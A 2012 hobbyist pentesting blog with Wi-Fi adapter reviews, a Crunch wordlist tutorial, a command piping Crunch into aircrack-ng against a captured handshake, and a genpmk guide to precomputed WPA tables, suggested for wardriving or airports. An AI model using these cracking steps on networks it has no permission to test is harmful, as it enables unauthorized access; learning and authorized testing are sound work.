8/07/2012

"Big" unboxing!

After just 6 days, including weekends, I got all three things I ordered:

 - Alfa AWUS036NHA
 - Alfa carrying case
 - Alfa 9dBi antenna.


Lets roll!

ALFA
A
W
U
S
0
3
6
N
H
A




This is the box (Duh.)
It didn't include a mounting cup, though :-/









It has glossy paint, and the LED is blue. (The AWUS036H has yellow LED)









Next one!

9
d
B
i
A
n
t
e
n
n
a
















I must say, it is BIG! Almost 40cm! (That's what she said..)
So when you use it, you should lay the Alfa down, or hold the antenna. Also, here is a comparison to the 5dBi antenna.

Another one!

ALFA
C
a
r
r
y
C
a
s
e



They included a mounting cup, how nice. Now I have one for both of my Alfas.

The packaging for the case says it's waterproof, thought I don't believe that.

























The case feels very good in you hands, and is very soft, so I think it will give good protection


The carry case and the adapter itself, I bought at the Rokland eBay store, for a total of 39$.
The antenna I bought from GigaCity eBay store for 9.99$.

I recommend both these stores!



Posted by kl. Ingen kommentarer:

8/06/2012

Discovered some problems with AirCrack-ng suite and Ubuntu 12.04

Since I already have Ubuntu on my laptop, I installed all the necessary tools to do my pentesting.
But when using Airodump-ng I discovered that I never managed to capture a handshake. I thought to myself that I just might be unlucky, but even after I tried with several computers, and several wireless adapters, I posted a thread on HackForums, where one user replied with: "Have you tried in BackTrack?"

Luckily, my desktop computer had a VM with BackTrack, so I tried. And guess what? I got the handshake in a blink of an eye.

I asked around what the problem could be, and some answered it could be NetworkManager, which puts the wireless adapter into managed mode again, which means I can't listen and capture the packets flowing in the air.

So I tried both killing and stopping the NetworkManager, and it worked, once.
Then I said, screw this. Installed BackTrack to a VM and deal with the problem some other time.

So when anybody have a solution to totally killing the NetworkManager, hit me up in the comments ;-)
Posted by kl. Ingen kommentarer:

8/04/2012

Crunch!

Since I love how Crunch works, I will make a tutorial on how to use it :-)

To install it, download the Crunch http://sourceforge.net/projects/crunch-wordlist/

cd /path/to/downloaded/archive
tar -xvf crunch_archive.tgz
cd /path/to/extracted/folder/
sudo make && make install

Troubleshooting:

If you get this error: 
Building binary...
/usr/bin/gcc -Wall -lm -pthread -std=c99  crunch.c -o crunch
crunch.c: In function ‘PrintPercentage’:
crunch.c:1006:20: warning: variable ‘finall’ set but not used [-Wunused-but-set-variable]
crunch.c: In function ‘renamefile’:
crunch.c:1032:12: warning: variable ‘pidret’ set but not used [-Wunused-but-set-variable]
crunch.c: In function ‘main’:
crunch.c:1805:8: warning: variable ‘loaded’ set but not used [-Wunused-but-set-variable]
/tmp/ccqWIgti.o: In function `count_strings':
crunch.c:(.text+0x1c1e): undefined reference to `pow'
crunch.c:(.text+0x1dd5): undefined reference to `pow'
crunch.c:(.text+0x1fd1): undefined reference to `pow'
collect2: ld returned 1 exit status
make: *** [crunch] Error 1

Then the math librarys aren't included, to fix it, simply run this command:

# /usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -o crunch -lm
[If you are on 64-bit platform, change "-m32" to "-m64"]

Crunch generates wordlist out of a characterset that you give it. F. ex.

./crunch 8 8 0123456789 -o 8Digit.ls

This will launch Crunch, make a wordlist named 8Digit.lst, only 8 character words, and the characterset is 0-9.








A neat little feature with Crunch, is that it displays the amount of words it will generate, how much space the wordlist will use and it has a sleep timer of 3 seconds, so if the wordlist is to big you can stop Crunch.

Crunch has the following options:

-b  Maximum bytes to write per file, so using this option the wordlist to be created can be split into various
      sizes such as KB / MB / GB (must be used in combination with "-o START" switch)
-c  Number of lines to write to output file, must be used together with "-o START"
-d  Limits the number of consecutive identical characters (crunch v3.2)
-e Specifies when crunch should stop early (crunch v3.1)
-f  Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst
    to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space'
-i  Inverts the output sequence from left-to-right  to  right-to-left
    (So instead of aaa, aab, aac, aad etc, output would be aaa baa caa daa)
-l  When specifying custom patterns with the -t option, the -l switch allows you to identify which of the characters
    should be taken as a literal character instead of a place holder ( @,%^ )
-o  Allows you to specify the file name / location for the output, e.g. /media/flashdrive/wordlist.txt
-p  Prints permutations of the words or characters provided in the command line.
-q  Prints permutation of the words or characters found in a specified file
-r  Resumes from a previous session, exact same syntax to be used followed by -r
-s  Allows you to specify the starting string for your wordlist.
-t  Allows you to specify a specific pattern to use. Probably one of the most important functions !
     Place holders for fixed character sets are ;
     @   --  lower case alpha characters
     ,    --   upper case alhpa characters
     %   --  numeric characters
    ^    --  special characters (including space)
-u  Supresses the output of wordlist size & linecount prior starting wordlist generation.
-z  Adds support to compress the generation output, supports gzip, bzip & lzma

If you are creating big wordlists, Crunch also supports compression in gzip, bzip2 and lzma.

./crunch 6 6 0123456789 -o 8Digit.lst -z lzma













Also another neat feature, is that you can pipe the outputs of Crunch to AirCrack-ng for example.

./crunch 8 8 0123456789 | aircrack-ng -e test -w - capture.cap
[Little picturefail here, I used the command mentioned above.]












This one is a little crazy :-P






To learn more about Crunch, in terminal, type "man crunch".
Posted by kl. Ingen kommentarer:

8/03/2012

Alfa AWUS036H review.

So lets start.

The package contains:
 - The Alfa adapter.
 - Usb cable, 1m approximately.
 - 5dBi antenna.
 - A plastic mount cup.











 




The adapter looks like this with, and without the mount cup:




















I must say first, it is really lightweight. It's like there is nothing in your hands.

The build quality is okey, I guess. It has a platic-ish feeling to it, and I feel that if I drop it to thr ground it will break, but what can you expect for a awesome adapter for 26$.

So lets see it's performance!

First, my internal Atheros chipset.









Now, with the Alfa AWUS036H.












I would say that the AWUS036H can do around 90ft (30m) in "terrain", by that I mean trees, bushes, walls etc.
But in clear sight it can probably do 120(60m), or 150ft.(70m).

So overall, I'd say this is an awesome adapter, at an awesome price. I like it because it is, as said above, lightweight, easy to handle, good range, stable chipset. it do have some downpoints also, it feels kind of cheap, and plasticy. Also since the chipset does not have a heatsink, it get's a little hot after a while. Although it has some downpoints, it is worth 26$, and it's awesome to everybody who is into networking and pentesting. Also, I recommend to buy it at Rokland store website (Link one the side), or Rokland eBay store (that's where I bought mine). Rokland are a certified Alfa distributor. So they are trusted.

And, here is some more pictures:




It also fits perfect on the top of a laptop screen ;-)





















(I will do a comparison on the 5dBi antenna and the 9dBi antenna when it arrives.)
Posted by kl. Ingen kommentarer:

8/02/2012

Alfa AWUS036NHA is coming soon

I've ordered an Alfa AWUS036NHA for myself. It's probably here in a week or something, I'll do an unboxing when it has arrived.
Posted by kl. Ingen kommentarer:

Wordlists!

Here is some wordlists (torrents)

27 rainbow tables: http://adf.ly/Amgn4
8 digit wordlist, with the characterset: 0-9: http://adf.ly/AmhH5
8 digit wordlist, with the characterset: 0-9, A-F, a-f: http://adf.ly/Amgxp
9 digit wordlist, with the characterset: 0-9: http://adf.ly/Amh2X
10 digit wordlist, with the characterset: 0-9: http://adf.ly/Amh5r
WiFoo-er's wordlists, cleaned up and 1337ified(in their own files): http://adf.ly/AneyW
Posted by kl. Ingen kommentarer:

How to generate rainbow tables for CoWPAtty/Pyrit

First a little lesson on lookup tables.

Dictionary attacks is a very slow process.
The passphrase is hashed 4096 times with SHA-1 and 256 bits of the output is the resulting hash, then the output hash is compared to the hash in the key exchange (handshake).
My own laptop is able to do 450 PMK/s.

But in lookup tables, the hash is already there to comparison with the key exchange hash, so the process is ALOT faster!
This all sounds great, huh? There has to be a catch.

And there is, the mentioned WPA output hash is salted with it's ESSID, so the table you create is only vulnerable to the ESSID you salted the table with. Therefore, you should only make tables for common ESSID's. As the time it takes to make one, is wasted when it can only be used once.

The Church of WiFi, has already made a big lookup table with the 1000 most commonly used ESSID's, based on their own wordlist, that table can come in handy when wardriving, on an airport etc. so I recommend downloading that (link in the end of guide).

But back to the guide.
(In my example I use the church of WiFi's wordlist's, plus some words I've added myself)

You will need two things:
- Genpmk (included in coWPAtty package).
- A dictionary file.
- Time.

1. Open up a terminal and cd to the directory where your wordlist is placed (optional). In my example:

Code:
cd Desktop/

2. Use genpmk to generate the lookup table. In my example I am creating the table AndroidAPRainbowTable salted with ESSID AndroidAP, and the wordlist mentioned above.
Code:
genpmk -f RenderlabWordList.lst -s AndroidAP -d AndroidAPRainbowTable

The -f is for the dictionary file. -s is for the ESSID (SSID) -d is for the output file.

Your terminal should look like this:
[Image: genpmkthread.png]

Now you'll have to wait. This will take some time, depending on how big your dictionary file is. Genpmk is a single threaded program, so it can't take advantage of all 8 cores on you fancy new 8 core CPU.

When it's done it should look something like this:
[Image: genpmkfinished.png]

When I was finished with this table, I used it againt a handshake I captured from my phones hotspot feature. In Pyrit, (CoWPAtty wouldn't accept my handshake), I got a wopping 720.000 PMK/s, on the same laptop as I mentioned above, which means I walked through the dictionary in 1,5 second. Now, that's fast!

Source: http://www.renderlab.net/projects/WPA-tables/

Here is a script, and 1000 most used SSIDs for mass-generating of tables: http://adf.ly/Ar5E4
You have to edit the script to the wordlist you are using, remove "./" in front of genpmk and replace "passwords2.txt" with your decired wordlist.
Posted by kl. Ingen kommentarer:

Get ready!

First post. I've created this blog to make networking and pentesting easier. Enjoi!
Posted by kl. Ingen kommentarer:
Abonner på: Kommentarer (Atom)